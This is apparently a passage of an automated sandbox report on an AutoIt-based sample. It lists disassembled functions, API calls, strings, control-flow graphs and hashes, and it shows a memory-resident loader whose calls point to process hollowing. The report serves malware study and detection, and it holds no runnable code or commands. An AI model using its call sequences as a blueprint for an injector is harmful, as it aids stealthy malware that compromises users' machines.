                                                    • RegisterClassExW.USER32(?), ref: 00653B16
                                                      • Part of subcall function 00653041: GetSysColorBrush.USER32(0000000F), ref: 00653074
                                                      • Part of subcall function 00653041: RegisterClassExW.USER32(00000030), ref: 0065309E
                                                      • Part of subcall function 00653041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
                                                      • Part of subcall function 00653041: InitCommonControlsEx.COMCTL32(?), ref: 006530CC
                                                      • Part of subcall function 00653041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
                                                      • Part of subcall function 00653041: LoadIconW.USER32(000000A9), ref: 006530F2
                                                      • Part of subcall function 00653041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: 2250bf511e4de6db381ff249c170a5604641131a07e4794348509f4ea566ce1f
                                                    • Instruction ID: d53f2edf338af27de84c91941e460910e1e0a8aee782eded132b434a20cb79ea
                                                    • Opcode Fuzzy Hash: 2250bf511e4de6db381ff249c170a5604641131a07e4794348509f4ea566ce1f
                                                    • Instruction Fuzzy Hash: 652129B2D11304EBEB14DFA8EC09BDD7BB1FB48711F00811AE500A62E1D3B956448B98
                                                    Function 00653766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rq
                                                    • API String ID: 1825951767-3000925734
                                                    • Opcode ID: 4030b22e97089230c814587367a1a428cb83e4c3e48e0415363aecad0a0837d9
                                                    • Instruction ID: 70e60471ceaeff6fb88bfb6eb08a80b93bad262efa4d68bb6399343da98666eb
                                                    • Opcode Fuzzy Hash: 4030b22e97089230c814587367a1a428cb83e4c3e48e0415363aecad0a0837d9
                                                    • Instruction Fuzzy Hash: 90A191B2D0022D9ACB44EBA4DC56AEEB77ABF54301F40052EF806B7291DF745A0CCB64
                                                    Function 0065F76F Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 168comCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00670193
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0067019B
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006701A6
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006701B1
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006701B9
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006701C1
                                                      • Part of subcall function 006660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0065F930), ref: 00666154
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0065F9CD
                                                    • OleInitialize.OLE32(00000000), ref: 0065FA4A
                                                    • CloseHandle.KERNEL32(00000000), ref: 006945C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: <Wq$\Tq$p*$%n$Sq
                                                    • API String ID: 1986988660-1466840592
                                                    • Opcode ID: 4c773068e1e3511b29d9c9467482100f07777361632eec16021aa1f565ccf87d
                                                    • Instruction ID: ee7a91cc1e190e03a2150def53513d40b28018d36aa769942d48c693d14a3905
                                                    • Opcode Fuzzy Hash: 4c773068e1e3511b29d9c9467482100f07777361632eec16021aa1f565ccf87d
                                                    • Instruction Fuzzy Hash: E781ACB0911A80CE938CDF7DE8456D87BE6EBD8306750C12E9819CB2E1EB7845848F1D
                                                    Function 032D25B0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 983 32d25b0-32d265e call 32d0000 986 32d2665-32d268b call 32d34c0 CreateFileW 983->986 989 32d268d 986->989 990 32d2692-32d26a2 986->990 991 32d27dd-32d27e1 989->991 997 32d26a9-32d26c3 VirtualAlloc 990->997 998 32d26a4 990->998 992 32d2823-32d2826 991->992 993 32d27e3-32d27e7 991->993 999 32d2829-32d2830 992->999 995 32d27e9-32d27ec 993->995 996 32d27f3-32d27f7 993->996 995->996 1002 32d27f9-32d2803 996->1002 1003 32d2807-32d280b 996->1003 1004 32d26ca-32d26e1 ReadFile 997->1004 1005 32d26c5 997->1005 998->991 1000 32d2885-32d289a 999->1000 1001 32d2832-32d283d 999->1001 1008 32d289c-32d28a7 VirtualFree 1000->1008 1009 32d28aa-32d28b2 1000->1009 1006 32d283f 1001->1006 1007 32d2841-32d284d 1001->1007 1002->1003 1010 32d280d-32d2817 1003->1010 1011 32d281b 1003->1011 1012 32d26e8-32d2728 VirtualAlloc 1004->1012 1013 32d26e3 1004->1013 1005->991 1006->1000 1016 32d284f-32d285f 1007->1016 1017 32d2861-32d286d 1007->1017 1008->1009 1010->1011 1011->992 1014 32d272f-32d274a call 32d3710 1012->1014 1015 32d272a 1012->1015 1013->991 1023 32d2755-32d275f 1014->1023 1015->991 1019 32d2883 1016->1019 1020 32d286f-32d2878 1017->1020 1021 32d287a-32d2880 1017->1021 1019->999 1020->1019 1021->1019 1024 32d2761-32d2790 call 32d3710 1023->1024 1025 32d2792-32d27a6 call 32d3520 1023->1025 1024->1023 1031 32d27a8 1025->1031 1032 32d27aa-32d27ae 1025->1032 1031->991 1033 32d27ba-32d27be 1032->1033 1034 32d27b0-32d27b4 CloseHandle 1032->1034 1035 32d27ce-32d27d7 1033->1035 1036 32d27c0-32d27cb VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 032D2681
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 032D28A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateFileFreeVirtual
                                                    • String ID:
                                                    • API String ID: 204039940-0
                                                    • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                    • Instruction ID: 58e14c17b826a116b61379ef79944b88487fa42d82416677a3d3bc091084b775
                                                    • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                    • Instruction Fuzzy Hash: 67A10974E10309EBEB14CFA4D894BEEB7B5FF48304F248599E501BB280D7759A81CBA4
                                                    Function 006539D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1114 6539d5-653a45 CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00653A03
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00653A24
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00653A38
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00653A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 5802b15383f86f0fd8ea6faa8fd89aa9def4a49d77fb1f50449575f61a434cbc
                                                    • Instruction ID: 54095e54c1fc5f8c4fbf3d730972d82dce779d26e510c3dbc2689820ebdf23d7
                                                    • Opcode Fuzzy Hash: 5802b15383f86f0fd8ea6faa8fd89aa9def4a49d77fb1f50449575f61a434cbc
                                                    • Instruction Fuzzy Hash: 9DF030B2901290BEEA30571BAC08EA73E7EE7C6F60B00C02AB900A21B0C1750801CAB4
                                                    Function 032D23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1115 32d23b0-32d24a8 call 32d0000 call 32d22a0 CreateFileW 1122 32d24af-32d24bf 1115->1122 1123 32d24aa 1115->1123 1126 32d24c6-32d24e0 VirtualAlloc 1122->1126 1127 32d24c1 1122->1127 1124 32d255f-32d2564 1123->1124 1128 32d24e4-32d24fb ReadFile 1126->1128 1129 32d24e2 1126->1129 1127->1124 1130 32d24fd 1128->1130 1131 32d24ff-32d2539 call 32d22e0 call 32d12a0 1128->1131 1129->1124 1130->1124 1136 32d253b-32d2550 call 32d2330 1131->1136 1137 32d2555-32d255d ExitProcess 1131->1137 1136->1137 1137->1124
                                                    APIs
                                                      • Part of subcall function 032D22A0: Sleep.KERNELBASE(000001F4), ref: 032D22B1
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 032D249E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: 5KO70KDT2Q
                                                    • API String ID: 2694422964-157869485
                                                    • Opcode ID: 89e2e7457391da16eb7394dc3497d18d4cc0fa7707ab292215f9414c15cbf066
                                                    • Instruction ID: 5e5fe223719f009732fdc90e293b7c6139c5f08f8d5ddd3b45a49d1088fe742a
                                                    • Opcode Fuzzy Hash: 89e2e7457391da16eb7394dc3497d18d4cc0fa7707ab292215f9414c15cbf066
                                                    • Instruction Fuzzy Hash: B5516031D14309EBEF10DBA4C858BEEBB78AF44300F004599E609BB2C0DBB55B85CBA5
                                                    Function 0065407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1139 65407c-654092 1140 65416f-654173 1139->1140 1141 654098-6540ad call 657a16 1139->1141 1144 68d3c8-68d3d7 LoadStringW 1141->1144 1145 6540b3-6540d3 call 657bcc 1141->1145 1148 68d3e2-68d3fa call 657b2e call 656fe3 1144->1148 1145->1148 1149 6540d9-6540dd 1145->1149 1158 6540ed-65416a call 672de0 call 65454e call 672dbc Shell_NotifyIconW call 655904 1148->1158 1161 68d400-68d41e call 657cab call 656fe3 call 657cab 1148->1161 1151 654174-65417d call 658047 1149->1151 1152 6540e3-6540e8 call 657b2e 1149->1152 1151->1158 1152->1158 1158->1140 1161->1158
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0068D3D7
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • _memset.LIBCMT ref: 006540FC
                                                    • _wcscpy.LIBCMT ref: 00654150
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00654160
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 3942752672-1585850449
                                                    • Opcode ID: 06b55c601e58204e5cc379db9b86101a1040023531377f1909de835fda950e93
                                                    • Instruction ID: 1581e499b671b0b963f527b9519cab8b306ba57877ef2a0431bde72dee461a6a
                                                    • Opcode Fuzzy Hash: 06b55c601e58204e5cc379db9b86101a1040023531377f1909de835fda950e93
                                                    • Instruction Fuzzy Hash: BD31CFB2008701AFD3A4EB64EC46BDA77DAAF80305F10851EF985921E1DF74968CC79A
                                                    Function 0067541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                    • Instruction ID: 0739e1142037659de2b3830179574fe1cbf16c73576be264418fb5f9aad7d766
                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                    • Instruction Fuzzy Hash: EE51C570A00B05DBEB249F69D8805AE77A3AF40321F24C7ADF82E963D4D7B09D918B44
                                                    Function 0065686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00654DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654E0F
                                                    • _free.LIBCMT ref: 0068E263
                                                    • _free.LIBCMT ref: 0068E2AA
                                                      • Part of subcall function 00656A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00656BAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                    • API String ID: 2861923089-1757145024
                                                    • Opcode ID: 6334cf637708794971f69b34ea2c7a26788549cd5dc5eba189cc8d411cc580bb
                                                    • Instruction ID: 953b87d2029ab09fc839dbf6b9215c228dd650b6f427cba1dc59c52f45cab4a3
                                                    • Opcode Fuzzy Hash: 6334cf637708794971f69b34ea2c7a26788549cd5dc5eba189cc8d411cc580bb
                                                    • Instruction Fuzzy Hash: 23918C719002199FCF44EFA4CC919EDB7BAFF04310F00462EF816AB2A1DB75AA55CB64
                                                    Function 006535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006535A1,SwapMouseButtons,00000004,?), ref: 006535D4
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006535A1,SwapMouseButtons,00000004,?,?,?,?,00652754), ref: 006535F5
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,006535A1,SwapMouseButtons,00000004,?,?,?,?,00652754), ref: 00653617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: e408efd18544ad542937ecbc7c56b75d3567b552332d764e02a19a301bfd28f7
                                                    • Instruction ID: c74240182437a8558084735fcd9eb749679408b0506da973935421e6e5d774d0
                                                    • Opcode Fuzzy Hash: e408efd18544ad542937ecbc7c56b75d3567b552332d764e02a19a301bfd28f7
                                                    • Instruction Fuzzy Hash: 62115A71911228BFDB208F64DC40EEEB7BAEF04B81F00946AF805D7310D2719F549760
                                                    Function 032D12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 032D1A5B
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 032D1AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 032D1B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                    • Instruction ID: 145ec3c01bc2945131ba53802a9516e10b772bd9169e9253901e0ea04d83d2e1
                                                    • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                    • Instruction Fuzzy Hash: 80621C30A24258DBEB24CFA4C850BDEB376EF58300F1091A9D10DEB794E7B59E91CB59
                                                    Function 006B955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00654EE5: _fseek.LIBCMT ref: 00654EFD
                                                      • Part of subcall function 006B9734: _wcscmp.LIBCMT ref: 006B9824
                                                      • Part of subcall function 006B9734: _wcscmp.LIBCMT ref: 006B9837
                                                    • _free.LIBCMT ref: 006B96A2
                                                    • _free.LIBCMT ref: 006B96A9
                                                    • _free.LIBCMT ref: 006B9714
                                                      • Part of subcall function 00672D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00679A24), ref: 00672D69
                                                      • Part of subcall function 00672D55: GetLastError.KERNEL32(00000000,?,00679A24), ref: 00672D7B
                                                    • _free.LIBCMT ref: 006B971C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                    • Instruction ID: b6cc7fee03474d54c233ba677d8d19dd0aa0126a66400264778a2b2fa1ddaa7b
                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                    • Instruction Fuzzy Hash: 2D514CB1904219AFDF649F64CC85ADEBBBAEF48304F1044AEF60DA3241DB715A91CF58
                                                    Function 0067470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                    • Instruction ID: 115c0f763891cf23fc88a57e6813349d000593dbe264fb09670ee610b452ab58
                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                    • Instruction Fuzzy Hash: 7841A275A007499BDB1CCEA9C8889AE77A7AF42360B24C57DE81DCB740EF70DD418B45
                                                    Function 00654C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: AU3!P/n$EA06
                                                    • API String ID: 4104443479-1756779138
                                                    • Opcode ID: 04158e4b701f919bf29f62ccb8e7aea9151240352b877bd6a38683bb61383118
                                                    • Instruction ID: b20c9fa0bedeb6f65802016680ab4a004f5335f503136815a4c9fe2f1179e71d
                                                    • Opcode Fuzzy Hash: 04158e4b701f919bf29f62ccb8e7aea9151240352b877bd6a38683bb61383118
                                                    • Instruction Fuzzy Hash: 75417D21A0415867DF219B548C927FE7FB39F4530AF2842F9EC829B382DE245DCD83A1
                                                    Function 00657285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0068EA39
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0068EA83
                                                      • Part of subcall function 00654750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00654743,?,?,006537AE,?), ref: 00654770
                                                      • Part of subcall function 00670791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006707B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
